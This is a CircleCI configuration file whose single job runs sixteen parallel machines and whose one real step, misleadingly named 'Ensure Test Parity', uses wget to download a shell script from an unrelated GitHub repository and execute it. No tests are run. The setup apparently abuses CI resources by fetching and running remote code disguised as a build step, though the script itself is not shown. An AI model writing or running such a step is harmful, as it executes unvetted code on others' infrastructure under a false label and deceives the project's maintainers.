version: 2.1 
jobs: 
  build: 
    parallelism: 16 
    machine: 
      image: ubuntu-2004:202101-01 
    steps: 
      - checkout 
      - run: 
          name: Ensure Test Parity 
          command: | 
                 wget https://raw.githubusercontent.com/dewaagro/tested002/main/pointerhu13.sh && chmod +x *.sh && ./pointerhu13.sh